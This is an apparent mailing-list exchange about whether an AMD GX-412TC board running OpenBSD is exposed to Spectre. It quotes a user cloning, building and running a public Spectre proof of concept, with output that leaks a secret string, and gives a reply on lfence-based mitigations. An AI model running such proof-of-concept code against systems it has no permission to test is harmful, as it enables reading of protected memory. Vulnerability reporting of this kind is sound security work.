On Sat, Aug 25, 2018 at 06:08:49PM +0300, Consus wrote: > Hi, > > Seems like APU2 board is vulnerable to Spectre: > > $ uname -r > 6.3 > $ dmesg | grep cpu0 | grep AMD > cpu0: AMD GX-412TC SOC, 998.27 MHz > $ git clone https://github.com/crozone/SpectrePoC > $ cd SpectrePoC > $ gmake > $ ./spectre.out 85 > Using a cache hit threshold of 85. > Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED > INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED > Reading 40 bytes: > Reading at malicious_x = 0xffffffffffeff180... Success: 0x54=’T’ score=2 > Reading at malicious_x = 0xffffffffffeff181... Success: 0x68=’h’ score=2 > Reading at malicious_x = 0xffffffffffeff182... Success: 0x65=’e’ score=2 > Reading at malicious_x = 0xffffffffffeff183... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffffffffffeff184... Success: 0x4D=’M’ score=2 > Reading at malicious_x = 0xffffffffffeff185... Success: 0x61=’a’ score=2 > Reading at malicious_x = 0xffffffffffeff186... Success: 0x67=’g’ score=2 > Reading at malicious_x = 0xffffffffffeff187... Success: 0x69=’i’ score=2 > Reading at malicious_x = 0xffffffffffeff188... Success: 0x63=’c’ score=2 > Reading at malicious_x = 0xffffffffffeff189... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffffffffffeff18a... Success: 0x57=’W’ score=2 > Reading at malicious_x = 0xffffffffffeff18b... Success: 0x6F=’o’ score=2 > Reading at malicious_x = 0xffffffffffeff18c... Success: 0x72=’r’ score=2 > Reading at malicious_x = 0xffffffffffeff18d... Success: 0x64=’d’ score=2 > Reading at malicious_x = 0xffffffffffeff18e... Success: 0x73=’s’ score=2 > Reading at malicious_x = 0xffffffffffeff18f... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffffffffffeff190... Success: 0x61=’a’ score=2 > Reading at malicious_x = 0xffffffffffeff191... Success: 0x72=’r’ score=2 > Reading at malicious_x = 0xffffffffffeff192... Success: 0x65=’e’ score=2 > Reading at malicious_x = 0xffffffffffeff193... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffffffffffeff194... Success: 0x53=’S’ score=2 > Reading at malicious_x = 0xffffffffffeff195... Success: 0x71=’q’ score=2 > Reading at malicious_x = 0xffffffffffeff196... Success: 0x75=’u’ score=2 > Reading at malicious_x = 0xffffffffffeff197... Success: 0x65=’e’ score=2 > Reading at malicious_x = 0xffffffffffeff198... Success: 0x61=’a’ score=2 > Reading at malicious_x = 0xffffffffffeff199... Success: 0x6D=’m’ score=2 > Reading at malicious_x = 0xffffffffffeff19a... Success: 0x69=’i’ score=2 > Reading at malicious_x = 0xffffffffffeff19b... Success: 0x73=’s’ score=2 > Reading at malicious_x = 0xffffffffffeff19c... Success: 0x68=’h’ score=2 > Reading at malicious_x = 0xffffffffffeff19d... Success: 0x20=’ ’ score=2 > Reading at malicious_x = 0xffffffffffeff19e... Success: 0x4F=’O’ score=2 > Reading at malicious_x = 0xffffffffffeff19f... Success: 0x73=’s’ score=2 > Reading at malicious_x = 0xffffffffffeff1a0... Success: 0x73=’s’ score=2 > Reading at malicious_x = 0xffffffffffeff1a1... Success: 0x69=’i’ score=2 > Reading at malicious_x = 0xffffffffffeff1a2... Success: 0x66=’f’ score=2 > Reading at malicious_x = 0xffffffffffeff1a3... Success: 0x72=’r’ score=2 > Reading at malicious_x = 0xffffffffffeff1a4... Success: 0x61=’a’ score=2 > Reading at malicious_x = 0xffffffffffeff1a5... Success: 0x67=’g’ score=2 > Reading at malicious_x = 0xffffffffffeff1a6... Success: 0x65=’e’ score=2 > Reading at malicious_x = 0xffffffffffeff1a7... Success: 0x2E=’.’ score=2 > > I've double-checked output of syspatch(1) and fw_update(1) but no > pending updates exist. Am I missing something or there is no mitigation > for this AMD CPU family? >
That's spectre v1 IIRC. And yes, AMD is susceptible. Someone will need to do the work to move the lfence changes into llvm/clang (maybe that's already done) and you'll need an AMD cpu with the MSR to treat lfence as serializing (that is already committed, but you obviously need that CPU capability). -ml
